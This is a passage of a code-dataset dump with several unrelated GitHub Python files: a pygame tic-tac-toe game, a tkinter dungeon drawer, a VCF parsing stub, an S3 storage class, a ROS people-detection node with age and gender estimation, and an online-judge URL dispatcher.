1][col - 1] = xo\r\n if xo == 'x':\r\n screen.blit(x_img, (posx, posy))\r\n xo = '0'\r\n else:\r\n screen.blit(o_img, (posx, posy))\r\n xo = 'x'\r\n pygame.display.update()\r\n\r\n\r\ndef user_click():\r\n x, y = pygame.mouse.get_pos()\r\n if x < width / 3:\r\n col = 1\r\n print('h')\r\n elif x < (width / 3) * 2:\r\n col = 2\r\n elif x < width:\r\n col = 3\r\n else:\r\n col = None\r\n if y < height / 3:\r\n row = 1\r\n elif y < (height / 3) * 2:\r\n row = 2\r\n elif y < height:\r\n row = 3\r\n else:\r\n row = None\r\n if row and col and ttt[row - 1][col - 1] is None:\r\n global xo\r\n # draw the x or o on screen\r\n draw_xo(row, col)\r\n check_win()\r\n\r\n\r\ndef user_click_single():\r\n x, y = pygame.mouse.get_pos()\r\n col = 0\r\n if x < width / 3:\r\n col = 1\r\n elif x < (width / 3) * 2:\r\n col = 2\r\n elif x < width:\r\n col = 3\r\n else:\r\n col = None\r\n if y < height / 3:\r\n row = 1\r\n elif y < (height / 3) * 2:\r\n row = 2\r\n elif y < height:\r\n row = 3\r\n else:\r\n row = None\r\n if row and col and ttt[row - 1][col - 1] is None:\r\n global xo\r\n # draw the x or o on screen\r\n draw_xo(row, col)\r\n check_win()\r\n a = random.randrange(1, 4)\r\n b = random.randrange(1, 4)\r\n while ttt[a - 1][b - 1] is not None:\r\n a = random.randrange(1, 4)\r\n b = random.randrange(1, 4)\r\n draw_xo(a, b)\r\n check_win()\r\n\r\n\r\nhome_screen()\r\n\r\nrun = True\r\nwhile run:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n main_screen()\r\n x, y = pygame.mouse.get_pos()\r\n if y > 250:\r\n main_screen()\r\n while True:\r\n for e in pygame.event.get():\r\n if e.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif e.type == pygame.MOUSEBUTTONDOWN:\r\n user_click()\r\n if winner or draw:\r\n reset()\r\n pygame.display.update()\r\n clock.tick(fps)\r\n if y < 250:\r\n main_screen()\r\n while True:\r\n for f in pygame.event.get():\r\n print(f.type == pygame.MOUSEBUTTONDOWN)\r\n if f.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif f.type == pygame.MOUSEBUTTONDOWN:\r\n user_click_single()\r\n if winner or draw:\r\n reset()\r\n\r\n pygame.display.update()\r\n clock.tick(fps)\r\n","repo_name":"sreshtha10/tictactoeGUI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"25401696152","text":"import random\nfrom tkinter import *\n\nclass Dungeon(object):\n def __init__(self, RoomWidth, RoomHeight):\n self.RoomWidth = RoomWidth\n self.RoomHeight = RoomHeight\n def Resolution(self):\n return \"resolution: %s,%s\" % (self.RoomWidth, self.RoomHeight)\n\nclass Window(object):\n def Create(width, height):\n WindowWidth = width\n WindowHeight = height\n BackGround = 'Khaki'\n _Window = Canvas(width = WindowWidth, height = WindowHeight, bg = BackGround)\n _Window.pack()\n return _Window\n\nif __name__ == \"__main__\":\n width = 600\n height = 600\n WorkSpace = Window.Create(width,height)\n\n \n Room = []\n for num in range(random.randint(10, 50)):\n Room.append(num)\n Room[num] = Dungeon(random.randint(5,50), random.randint(5,50))\n print(\"Room #%s, %s\"% (num, Room[num].Resolution()))\n WorkSpace.create_rectangle(width/2-Room[num].RoomWidth, height/2-Room[num].RoomHeight,\n width/2+Room[num].RoomWidth, height/2+Room[num].RoomHeight,\n outline = 'Blue')\n","repo_name":"ShakulaAndrew/DungeonMaker","sub_path":"DungeonMaker.py","file_name":"DungeonMaker.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21115329101","text":"#Input : $python mutantSeq.py \n### ENSTtoAA.py output == per/line ::: ;;;;;\n\n#Output for each VCF line\n### \n\n\nimport sys\n\n##call in the VCF file\nvcfFile = sys.argv[1] ## VCF File\nenstFile = sys.argv[2] ## ENSTtoAA.py outputfile\n\nwith open(vcfFile,'r') as i:\n entries = i.readlines()\n\nwith open(enstFile,'r') as i:\n lines = i.readlines()\n\nparsedVCF = []\nfor i in entries:\n if i[0] != '#':\n parsedVCF.append(i)\n\n## Convert the ENSTtoAA.py to a Dictionary with the KEY == ENST ID\nenstDict = {}\nfor i in lines:\n units = i.split(';')\n enstDict[units[0]] = units[1:]\n\nsnpDict = {}\nfor i in parsedVCF:\n info = i.split('\\t')\n newkey = info[0] + ':' + info[1]\n snpDict[newkey] = info[5] ### DICT { : }\n\n### Goal : go through each KEY of the dictionary and find the SNP's with corresponding Chromosome and Location of the CDS regions\n\nfor snp in snpDict:\n print(snp)\n\n\n\n","repo_name":"yuq1993/IBP-SNPeffect","sub_path":"Scripts_Colton/mutantSeq.py","file_name":"mutantSeq.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17090241756","text":"import logging\nimport posixpath\nfrom urllib.parse import urlparse\n\nimport boto3\nfrom botocore.client import Config\n\nfrom .base import BaseStorage\nfrom .types import FileInfo, FileMetadata, PresignedPostInfo, S3Object\n\nlogger = logging.getLogger(__name__)\n\n\n_config = None\n\n\ndef get_aws_session() -> boto3.Session:\n return boto3.Session()\n\n\ndef get_s3_public_file_url(region: str, bucket_name: str, path: str) -> str:\n return 'https://{name}.s3-{region}.amazonaws.com/{path}'.format(\n region=region, name=bucket_name, path=path)\n\n\nclass S3Storage(BaseStorage):\n \"\"\"Amazon S3 backed storage\n\n This is the recommended choice for production.\n \"\"\"\n\n def __init__(self, bucket_name: str, key_prefix: str = None) -> None:\n self.bucket_name = bucket_name\n self.key_prefix = key_prefix or ''\n\n @classmethod\n def from_url(cls, url): # type: (str) -> BaseStorage\n parsed = urlparse(url)\n if not parsed.netloc:\n raise ValueError(\n 'S3 bucket name missing. '\n 'Make sure the URL is in the form s3://bucket-name/key-prefix')\n return cls(parsed.netloc, key_prefix=parsed.path.lstrip('/'))\n\n def get_file(self, key: str) -> FileInfo:\n full_key = self._get_full_key(key)\n data = self._get_bucket().Object(full_key).get()\n return FileInfo(\n metadata=FileMetadata(\n content_type=data['ContentType']),\n content=data['Body'])\n\n def get_file_meta(self, key: str) -> FileMetadata:\n return self.get_file(key).metadata\n\n def get_file_content(self, key: str) -> bytes:\n return self.get_file(key).content\n\n def get_presigned_post(self, key: str, content_type: str) \\\n -> PresignedPostInfo:\n full_key = self._get_full_key(key)\n\n # s3 = get_aws_session().resource('s3')\n aws = get_aws_session()\n s3 = aws.client('s3', config=Config(signature_version='s3v4'))\n\n presigned_post = s3.generate_presigned_post(\n Bucket=self.bucket_name,\n Key=full_key,\n Fields={\"Content-Type\": content_type},\n Conditions=[\n # TODO: limit file size herx\n {\"Content-Type\": content_type}\n ],\n ExpiresIn=3600)\n return PresignedPostInfo(\n url=presigned_post['url'],\n fields=presigned_post['fields'])\n\n def _get_bucket(self):\n aws = get_aws_session()\n s3 = aws.resource('s3')\n return s3.Bucket(self.bucket_name)\n\n def _get_full_key(self, key: str) -> str:\n return posixpath.join(self.key_prefix, key)\n\n def _get_object(self, key: str) -> S3Object:\n full_key = self._get_full_key(key)\n return self._get_bucket().Object(full_key)\n\n def put_file(self, key: str, data: bytes, mime_type: str = None) -> None:\n self._get_object(key).put(Body=data, ContentType=mime_type)\n\n def get_file_url(self, key: str) -> str:\n full_key = self._get_full_key(key)\n return ('s3://{bucket}/{key}'\n .format(bucket=self.bucket_name, key=full_key))\n\n def file_exists(self, key: str) -> bool:\n from botocore.exceptions import ClientError\n\n aws = get_aws_session()\n s3_client = aws.client('s3')\n try:\n s3_client.head_object(\n Bucket=self.bucket_name,\n Key=self._get_full_key(key))\n except ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n return False\n raise\n return True\n\n def get_etag(self, key: str) -> str:\n return self._get_object(key).e_tag\n","repo_name":"rshk/mowaki-py","sub_path":"mowaki/storage/storage_s3.py","file_name":"storage_s3.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11332172942","text":"#!/usr/bin/env python3\nimport rospy\nimport math\nimport sys\nimport os\nfrom yolov8_data.msg import Object, ObjectsMSG\nfrom yolov8_data.srv import *\nfrom sensor_msgs.msg import Image as msg_Image\nfrom sensor_msgs.msg import CameraInfo as msg_CameraInfo\nfrom sensor_msgs.msg import CompressedImage as msg_CompressedImage\nfrom sensor_msgs.msg import PointCloud2 as msg_PointCloud2\nfrom geometry_msgs.msg import *\nfrom nav_msgs.msg import *\nimport numpy as np\nimport cv2\nimport queue\nimport yaml\nfrom PIL import Image\nimport torch\nimport copy\nimport gc\nfrom signal import signal, SIGINT\n\nimport lap\nfrom cython_bbox import bbox_overlaps as bbox_ious\n\ntorch.cuda.empty_cache() \nos.environ[\"PYTORCH_CUDA_ALLOC_CONF\"] = \"garbage_collection_threshold:0.6,max_split_size_mb:128\"\n\nsys.path.append('/home/robolab/software/JointBDOE')\nfrom utils.torch_utils import select_device\nfrom utils.general import check_img_size, scale_coords, non_max_suppression\nfrom utils.datasets import LoadImages\nfrom models.experimental import attempt_load\nfrom utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective\nfrom ultralytics import YOLO\n\nimport time\nimport tf\nimport message_filters\nimport torch\n\nsys.path.append('/home/robolab/software/BOSCH-Age-and-Gender-Prediction/models')\nfrom base_block import FeatClassifier, BaseClassifier\nfrom resnet import resnet50\nfrom collections import OrderedDict\nimport torchvision.transforms as T\n\nclass yolov8():\n def __init__(self):\n self.image_queue = queue.Queue(1)\n self.objects_publisher = rospy.Publisher(\"/perceived_people\", ObjectsMSG, queue_size=10)\n self.objects_write = []\n self.objects_read = []\n self.camera_info = None\n\n self.depth_image = []\n self.color_image = []\n\n self.robot_world_transform_matrix = np.array([])\n self.robot_orientation = None\n self.camera_pose_respect_robot = np.array([[1, 0, 0, 0.21331892690256105],\n [0, 1, 0, 0.004864029093594846],\n [0, 0, 1, -0.9769708264898666],\n [0, 0, 0, 1]])\n\n\n self.age_range = [[10, 30], [30, 45], [45, 50], [50, 70]]\n normalize = T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n self.valid_tsfm = T.Compose([\n T.Resize((256, 192)),\n T.ToTensor(),\n normalize\n ])\n backbone = resnet50()\n classifier = BaseClassifier(nattr=35)\n self.age_classification_model = FeatClassifier(backbone, classifier)\n\n if torch.cuda.is_available():\n self.age_classification_model = torch.nn.DataParallel(self.age_classification_model).cuda()\n else:\n print(\"AGE CLASSIFICATION MODEL CAN'T BE EXECUTED WITH CUDA\")\n\n self.load_age_predictor_state_dict(self.age_classification_model)\n\n self.width = 640\n self.height = 480\n\n self.color_depth_ratio = None\n self.color_yolo_ratio_height = None\n self.color_yolo_ratio_width = None\n\n self.new_data = False\n\n # self.yolo_model_name = 'yolov8m-seg.pt'\n self.yolo_model_name = 'yolov8n-pose.engine'\n\n self.model_v8 = YOLO(self.yolo_model_name)\n\n self.device = select_device(\"0\", batch_size=1)\n self.model = attempt_load(\"/home/robolab/software/JointBDOE/runs/JointBDOE/coco_s_1024_e500_t020_w005/weights/best.pt\", map_location=self.device)\n self.stride = int(self.model.stride.max())\n with open(\"/home/robolab/software/JointBDOE/data/JointBDOE_weaklabel_coco.yaml\") as f:\n self.data = yaml.safe_load(f) # load data dict\n \n################# SUBSCRIBER CALLBACKS #################\n\n def store_data(self, rgb, depth, odom):\n # print(\"STORING DATA\")\n self.color_image = cv2.cvtColor(np.frombuffer(rgb.data, np.uint8).reshape(rgb.height, rgb.width, 4), cv2.COLOR_RGBA2RGB )\n self.depth_image = np.frombuffer(depth.data, np.float32).reshape(depth.height, depth.width, 1)\n\n euler_rotation = tf.transformations.euler_from_quaternion([odom.pose.pose.orientation.x, odom.pose.pose.orientation.y, odom.pose.pose.orientation.z, odom.pose.pose.orientation.w])\n self.robot_orientation = euler_rotation[2]\n self.robot_world_transform_matrix = np.array([[math.cos(euler_rotation[2]), -math.sin(euler_rotation[2]), 0, odom.pose.pose.position.x],\n [math.sin(euler_rotation[2]), math.cos(euler_rotation[2]), 0, odom.pose.pose.position.y],\n [0, 0, 1, odom.pose.pose.position.z],\n [0, 0, 0, 1]])\n self.new_data = True\n \n################# DATA OBTAINING #################\n\n def get_people_data(self, img, depth, robot_trans_matrix, robot_orientation):\n img0 = copy.deepcopy(img)\n img = letterbox(img, 640, stride=self.stride, auto=True)[0]\n img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB\n img = np.ascontiguousarray(img)\n img = torch.from_numpy(img).to(self.device)\n img = img / 255.0 # 0 - 255 to 0.0 - 1.0\n \n if len(img.shape) == 3:\n img = img[None] # expand for batch dim\n\n # Make inference with both models\n init = time.time()\n out_ori = self.model(img, augment=True, scales=[1])[0]\n out_v8 = self.model_v8.predict(img0, classes=0, show_conf=True)\n print(\"EXPENDED TimE:\", time.time() - init)\n # # YOLO V8 data processing\n # if \"pose\" in self.yolo_model_name:\n # bboxes, confidences, poses = self.get_pose_data(out_v8, depth, robot_trans_matrix, img0)\n # else:\n # bboxes, confidences, poses = self.get_segmentator_data(out_v8, depth, robot_trans_matrix)\n\n # # Orientation model data processing\n\n # out = non_max_suppression(out_ori, 0.3, 0.5, num_angles=self.data['num_angles'])\n # orientation_bboxes = scale_coords(img.shape[2:], out[0][:, :4], img0.shape[:2]).cpu().numpy().astype(int) # native-space pred\n # orientations = (out[0][:, 6:].cpu().numpy() * 360) - 180 # N*1, (0,1)*360 --> (0,360)\n \n # # Hungarian algorithm for matching people from segmentation model and orientation model\n\n # matches = self.associate_orientation_with_segmentation(orientation_bboxes, bboxes)\n\n # # aux_objects_write = []\n # # for match in matches:\n # # act_object = Object()\n # # act_object.type = 0\n # # act_object.left = int(segmentation_bboxes[match[1]][0])\n # # act_object.top = int(segmentation_bboxes[match[1]][1])\n # # act_object.right = int(segmentation_bboxes[match[1]][2])\n # # act_object.bot = int(segmentation_bboxes[match[1]][3])\n # # act_object.score = segmentation_confidences[match[1]]\n # # act_object.orientation = orientations[match[0]]\n # # aux_objects_write.append(act_object)\n # # bytetrack_srv_proxy = rospy.ServiceProxy('bytetrack_srv', ObjectsSRV)\n # # try:\n # # aux_objects_read = bytetrack_srv_proxy(aux_objects_write).res\n # # except rospy.ServiceException as e:\n # # print(\"Service call failed: %s\"%e)\n # # ret_bboxes = [[person.left if person.left > 0 else 0, person.top if person.top > 0 else 0, person.right if person.right < self.width else self.width - 1, person.bot if person.bot < self.height else self.height - 1] for person in aux_objects_read]\n # # ret_scores = [person.score for person in aux_objects_read]\n # # ret_orientations = [person.orientation for person in aux_objects_read]\n\n # associated_orientations = []\n # for i in range(len(matches)):\n # for j in range(len(matches)):\n # if i == matches[j][1]:\n # transformed_pose = tf.transformations.quaternion_from_euler(0, 0, math.radians(orientations[matches[j][0]][0]) - math.pi) \n # transformed_pose_quaternion = Quaternion(x=transformed_pose[0], y=transformed_pose[1], z=transformed_pose[2], w=transformed_pose[3])\n # # associated_orientations.append(transformed_pose_quaternion)\n # associated_orientations.append(self.transform_orientation_to_world_reference(math.radians(orientations[matches[j][0]][0]), robot_orientation))\n # break\n\n # if len(bboxes) == 0:\n # return [], [], [], []\n # # ret_orientations = [orientations[match[]] for match in matches]\n\n # return bboxes, confidences, associated_orientations, poses\n # return segmentation_bboxes, segmentation_poses, segmentation_confidences\n\n def get_pose_data(self, result, depth_image, robot_trans_matrix, frame):\n pose_bboxes = []\n pose_poses = []\n pose_confidences = []\n for result in result:\n if result.keypoints != None and result.boxes != None:\n boxes = result.boxes\n keypoints = result.keypoints.xy.cpu().numpy().astype(int)\n if len(keypoints) == len(boxes):\n for i in range(len(keypoints)):\n person_bbox = boxes[i].xyxy.cpu().numpy().astype(int)[0] \n if len(keypoints[i]) > 0: \n x_avg = (keypoints[i][5, 0] + keypoints[i][6, 0]) / 2\n y_avg = (keypoints[i][5, 1] + keypoints[i][6, 1]) / 2\n if x_avg < 100 or x_avg > self.width - 100:\n continue\n neck_point = np.array([x_avg, y_avg]).astype(int)\n gender_pred, age_pred = self.get_pred_attributes(frame, person_bbox[0], person_bbox[1], person_bbox[2], person_bbox[3])\n person_pose = self.get_neck_distance(neck_point, depth_image, robot_trans_matrix)\n pose_poses.append(person_pose)\n pose_bboxes.append(person_bbox)\n pose_confidences.append(boxes[i].conf.cpu().numpy()[0]) \n return pose_bboxes, pose_confidences, pose_poses\n\n\n def get_neck_distance(self, neck_point, depth_image, robot_trans_matrix):\n neck_point[0] = neck_point[0] - 1 if neck_point[0] >= self.height else neck_point[0]\n neck_point[1] = neck_point[1] - 1 if neck_point[1] >= self.width else neck_point[1]\n if not np.isinf(depth_image[neck_point[1], neck_point[0]]):\n neck_point_3d = self.depth_point_to_xyz(neck_point, depth_image[neck_point[1], neck_point[0]])\n world_neck_point_3d = self.transform_pose_to_world_reference(neck_point_3d, robot_trans_matrix)\n return world_neck_point_3d\n else:\n return [np.inf, np.inf]\n\n def get_segmentator_data(self, result, depth_image, robot_trans_matrix):\n segmentation_bboxes = []\n segmentation_poses = []\n segmentation_confidences = []\n for result in result:\n if result.masks != None and result.boxes != None:\n masks = result.masks.xy\n boxes = result.boxes\n if len(masks) == len(boxes):\n for i in range(len(boxes)):\n person_bbox = boxes[i].xyxy.cpu().numpy().astype(int)[0]\n segmentation_bboxes.append(person_bbox)\n segmentation_confidences.append(boxes[i].conf.cpu().numpy()[0])\n person_pose = self.get_mask_distance(masks[i], depth_image, robot_trans_matrix)\n segmentation_poses.append(person_pose)\n return segmentation_bboxes, segmentation_confidences, segmentation_poses\n\n def get_mask_distance(self, mask, depth_image, robot_trans_matrix):\n valid_points = []\n for point in mask:\n x, y = int(point[0]), int(point[1])\n if not np.isinf(depth_image[y, x]):\n valid_points.append(self.depth_point_to_xyz(point, depth_image[y, x]))\n\n if valid_points:\n mean_point = np.mean(valid_points, axis=0)\n world_pose = self.transform_pose_to_world_reference(mean_point, robot_trans_matrix)\n return world_pose\n else:\n return [np.inf, np.inf]\n\n def associate_orientation_with_segmentation(self, seg_bboxes, ori_bboxes):\n dists = self.iou_distance(seg_bboxes, ori_bboxes)\n matches, unmatched_a, unmatched_b = self.linear_assignment(dists, 0.9)\n # print(\"NO MATCHES A\", unmatched_a)\n # print(\"NO MATCHES b\", unmatched_b)\n # print(\"MATCHES\", matches)\n return matches\n\n def linear_assignment(self, cost_matrix, thresh):\n if cost_matrix.size == 0:\n return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1]))\n matches, unmatched_a, unmatched_b = [], [], []\n cost, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)\n for ix, mx in enumerate(x):\n if mx >= 0:\n matches.append([ix, mx])\n unmatched_a = np.where(x < 0)[0]\n unmatched_b = np.where(y < 0)[0]\n matches = np.asarray(matches)\n return matches, unmatched_a, unmatched_b\n\n def iou_distance(self, atracks, btracks):\n if (len(atracks)>0 and isinstance(atracks[0], np.ndarray)) or (len(btracks) > 0 and isinstance(btracks[0], np.ndarray)):\n atlbrs = atracks\n btlbrs = btracks\n else:\n atlbrs = [track.tlbr for track in atracks]\n btlbrs = [track.tlbr for track in btracks]\n _ious = self.ious(atlbrs, btlbrs)\n cost_matrix = 1 - _ious\n\n return cost_matrix\n\n def ious(self, atlbrs, btlbrs):\n ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=float)\n if ious.size == 0:\n return ious\n\n ious = bbox_ious(\n np.ascontiguousarray(atlbrs, dtype=float),\n np.ascontiguousarray(btlbrs, dtype=float)\n )\n\n return ious\n\n # def get_people_pose(self, people_bboxes, depth_image):\n # radius = 5\n # color = (0, 0, 255) # Color en formato BGR (azul)\n # thickness = -1 # Relleno del círculo\n # people_poses = []\n # for person_bbox in people_bboxes:\n # cv2.rectangle(self.color_image, (int(person_bbox[0]), int(person_bbox[1])), (int(person_bbox[2]), int(person_bbox[3])), (255, 0, 0), 2)\n # x_range = int(person_bbox[0] + (person_bbox[2] - person_bbox[0]) / 2)\n # y_range = int(person_bbox[1] + (person_bbox[3] - person_bbox[1]) / 5)\n # # image_section = depth_image[int(person_bbox[3] / 5):int(person_bbox[3] / 4), x_range]\n # # print(image_section)\n # # # print(image_section)\n # # if image_section.size > 0: \n # # min_value = np.unravel_index(np.argmin(image_section), image_section.shape) \n # # else: \n # # continue\n\n # if math.isinf(depth_image[y_range][x_range]):\n # image_section = depth_image[y_range, int(person_bbox[0]):int(person_bbox[2])]\n # print(\"SECTION X\", int(person_bbox[2] / 4), int(person_bbox[2] * 3 / 4))\n # # print(image_section)\n # if image_section.size > 0: \n # print(image_section.shape)\n # min_value = np.unravel_index(np.argmin(image_section), image_section.shape) \n # if not math.isinf(depth_image[y_range][min_value[0]]): \n # print(\"Min value:\", min_value)\n # from_robot_pose = self.depth_point_to_xyz([min_value[0] + person_bbox[0], y_range], depth_image[y_range][min_value[0] + person_bbox[0]])\n # cv2.circle(self.color_image, (min_value[0] + person_bbox[0], y_range), radius, color, thickness)\n # else:\n # print(\"PROJECTED POINT:\", x_range, person_bbox[3])\n # cv2.circle(self.color_image, (x_range, person_bbox[3]), radius, color, thickness)\n # from_robot_pose = self.calculate_depth_with_projection([x_range, person_bbox[3]])\n # else: \n # print(\"PROJECTED POINT:\", x_range, person_bbox[3])\n # cv2.circle(self.color_image, (x_range, person_bbox[3]), radius, color, thickness)\n # from_robot_pose = self.calculate_depth_with_projection([x_range, person_bbox[3]])\n # else:\n # print(\"DEPTH POINT:\", x_range, y_range)\n # cv2.circle(self.color_image, (x_range, y_range), radius, color, thickness)\n # from_robot_pose = self.depth_point_to_xyz([x_range, y_range], depth_image[y_range][x_range])\n # world_person_pose = self.transform_pose_to_world_reference(from_robot_pose)\n # people_poses.append(world_person_pose)\n # return people_poses\n \n def get_yolo_objects(self, event):\n if self.new_data:\n depth_image = self.depth_image\n color_image = self.color_image\n robot_trans_matrix = self.robot_world_transform_matrix\n robot_orientation = self.robot_orientation\n self.get_people_data(color_image, depth_image, robot_trans_matrix, robot_orientation)\n # bboxes, scores, orientations, poses = self.get_people_data(color_image, depth_image, robot_trans_matrix, robot_orientation)\n # self.create_interface_data(bboxes, orientations, poses, scores)\n # self.new_data = False\n\n################# DATA STRUCTURATION #################\n\n def create_interface_data(self, boxes, orientations, centers, scores):\n objects = ObjectsMSG()\n objects.header.stamp = rospy.Time.now()\n print(\"EEE\")\n if len(boxes) == len(orientations) == len(centers) == len(scores):\n for index in range(len(boxes)):\n act_object = Object()\n act_object.type = 0\n act_object.left = boxes[index][0]\n act_object.top = boxes[index][1]\n act_object.right = boxes[index][2]\n act_object.bot = boxes[index][3]\n act_object.score = scores[index]\n # bbx_center_depth = [int((act_object.left + (act_object.right - act_object.left)/2)), int((act_object.top + (act_object.bot - act_object.top)/2))]\n act_object.pose = Pose()\n act_object.pose.position.x = centers[index][0] \n act_object.pose.position.y = centers[index][1]\n\n act_object.pose.orientation = orientations[index]\n act_object.image = self.get_bbox_image_data(self.color_image, [act_object.left, act_object.top, act_object.right, act_object.bot])\n \n objects.objectsmsg.append(act_object)\n print(len(objects.objectsmsg))\n self.objects_publisher.publish(objects)\n\n def get_bbox_image_data(self, image, element_box):\n cropped_image = image[int(element_box[1]):int(element_box[3]), int(element_box[0]):int(element_box[2])]\n y, x, _ = cropped_image.shape\n return msg_Image(data=cropped_image.tobytes(), height=y, width=x)\n\n################# TO WORLD TRANSFORMATIONS #################\n\n def transform_pose_to_world_reference(self, person_pose, robot_trans_matrix):\n # print(person_pose)\n # person_world_position = np.dot(self.camera_pose_respect_robot, np.dot(robot_trans_matrix, np.array([person_pose[0], -person_pose[1], 0, 1])))\n person_world_position = np.dot(robot_trans_matrix, np.array([person_pose[0], -person_pose[1], 0, 1]))\n\n return [round(person_world_position[0], 3), round(person_world_position[1], 3)]\n \n def transform_orientation_to_world_reference(self, orientation, robot_orientation):\n theta_world = robot_orientation + orientation\n transformed_pose = tf.transformations.quaternion_from_euler(0, 0, -((math.pi)-np.arctan2(np.sin(theta_world), np.cos(theta_world)))) \n return Quaternion(x=transformed_pose[0], y=transformed_pose[1], z=transformed_pose[2], w=transformed_pose[3])\n\n################# IMAGE POINTS TO DEPTH #################\n\n def depth_point_to_xyz(self, pixel, depth):\n # angle_y = ((math.pi - 1.01)/2) + (pixel[1]*1.01/480)\n # angle_z = ((2*math.pi) - 0.785/2) + (pixel[0]*0.785/640)\n angle_y = ((math.pi - 0.785)/2) + (pixel[1]*0.785/480)\n angle_z = ((2*math.pi) - 1.01/2) + (pixel[0]*1.01/640)\n y_distance = depth / math.tan(angle_y)\n z_distance = depth * math.tan(angle_z)\n return depth[0], z_distance[0], y_distance[0]\n \n def calculate_depth_with_projection(self, projected_point):\n world_y = 579.65506 * 1.2 / (projected_point[1] - 243.0783)\n world_x = world_y * (projected_point[0] - 317.47191) / 577.55158\n return [world_y, world_x]\n \n################# PERSON ATTRIBUTES #################\n\n\n\n def get_pred_attributes(self, frame, x1, y1, x2, y2):\n img = frame[y1:y2, x1:x2]\n img = Image.fromarray(img)\n img = self.valid_tsfm(img)\n valid_logits = self.age_classification_model(img.unsqueeze(0))\n valid_probs = torch.sigmoid(valid_logits)\n \n age_pred = self.age_range[torch.argmax(valid_probs[0][0:-1])]\n gender_pred = \"M\" if valid_probs[0][-1] > 0.5 else \"F\"\n\n return gender_pred, age_pred\n\n def load_age_predictor_state_dict(self, model):\n\n PATH_TO_AGE_GENDER_PREDICTOR_CHECKPOINT = '/home/robolab/software/BOSCH-Age-and-Gender-Prediction/exp_result/PETA/PETA/img_model/ckpt_max.pth'\n\n loaded = torch.load(PATH_TO_AGE_GENDER_PREDICTOR_CHECKPOINT, map_location=torch.device(\"cuda:0\"))\n\n if not torch.cuda.is_available():\n # remove `module.`\n new_state_dict = OrderedDict()\n for k, v in loaded['state_dicts'].items():\n name = k[7:] \n new_state_dict[name] = v\n\n # load parameters\n model.load_state_dict(new_state_dict, strict=False)\n else: \n model.load_state_dict(loaded['state_dicts'], strict=False)\n \n print(\"Load successful\")\n model = model.eval()\n\n\n\n\ndef handler(signal_received, frame):\n # Handle any cleanup here\n print('SIGINT or CTRL-C detected. Exiting gracefully')\n gc.collect()\n torch.cuda.empty_cache()\n exit(0)\n\n################# MAIN #################\n\nif __name__ == '__main__':\n rospy.init_node(\"yolov8\")\n rospy.loginfo(\"yolov8 node has been started\")\n\n signal(SIGINT, handler)\n\n yolo = yolov8()\n # rospy.wait_for_service('bytetrack_srv')\n\n rgb_subscriber = message_filters.Subscriber(\"/xtion/rgb/image_raw\", msg_Image)\n depth_subscriber = message_filters.Subscriber(\"/xtion/depth/image_raw\", msg_Image)\n odom_subscriber = message_filters.Subscriber(\"/camera_odom\", Odometry)\n \n ts = message_filters.TimeSynchronizer([rgb_subscriber, depth_subscriber, odom_subscriber], 5)\n ts.registerCallback(yolo.store_data)\n rospy.Timer(rospy.Duration(0.033), yolo.get_yolo_objects)\n rospy.spin()\n\n # rospy.logwarn(\"Warning test message\")\n # rospy.logerr(\"Error test message\")\n # rospy.loginfo(\"End of program\")\n","repo_name":"GeraGrind96/ROS_people_tracking","sub_path":"yolov8/scripts/complete_pose.py","file_name":"complete_pose.py","file_ext":"py","file_size_in_byte":23431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70228591922","text":"# Python Version: 3.x\n\"\"\"\n.. py:data:: services\n\n :type: :py:class:`List` [ :py:class:`Type` [ :py:class:`onlinejudge.type.Service` ] ]\n\n contains classes to use for :py:func:`service_from_url`\n\n.. py:data:: problems\n\n :type: :py:class:`List` [ :py:class:`Type` [ :py:class:`onlinejudge.type.Problem` ] ]\n\n contains classes to use for :py:func:`problem_from_url`\n\n.. py:data:: submissions\n\n :type: :py:class:`List` [ :py:class:`Type` [ :py:class:`onlinejudge.type.Submission` ] ]\n\n contains classes to use for :py:func:`submission_from_url`\n\"\"\"\n\nfrom typing import List, Optional, Type\n\nfrom onlinejudge.type import Contest, Problem, Service, Submission\n\nsubmissions = [] # type: List[Type['Submission']]\n\n\ndef submission_from_url(url: str) -> Optional[Submission]:\n for cls in submissions:\n submission = cls.from_url(url)\n if submission is not None:\n return submission\n return None\n\n\nproblems = [] # type: List[Type['Problem']]\n\n\ndef problem_from_url(url: str) -> Optional[Problem]:\n \"\"\"\n >>> onlinejudge.dispatch.problem_from_url(\"https://atcoder.jp/contests/abc077/tasks/arc084_b\")\n \n\n >>> onlinejudge.dispatch.problem_from_url(\"https://codeforces.com/contest/1012/problem/D\")\n \n \"\"\"\n\n for cls in problems:\n problem = cls.from_url(url)\n if problem is not None:\n return problem\n return None\n\n\ncontests = [] # type: List[Type['Contest']]\n\n\ndef contest_from_url(url: str) -> Optional[Contest]:\n for cls in contests:\n contest = cls.from_url(url)\n if contest is not None:\n return contest\n return None\n\n\nservices = [] # type: List[Type['Service']]\n\n\ndef service_from_url(url: str) -> Optional[Service]:\n for cls in services:\n service = cls.from_url(url)\n if service is not None:\n return service\n submission = submission_from_url(url)\n if submission is not None:\n return submission.get_service()\n problem = problem_from_url(url)\n if problem is not None:\n return problem.get_service()\n return 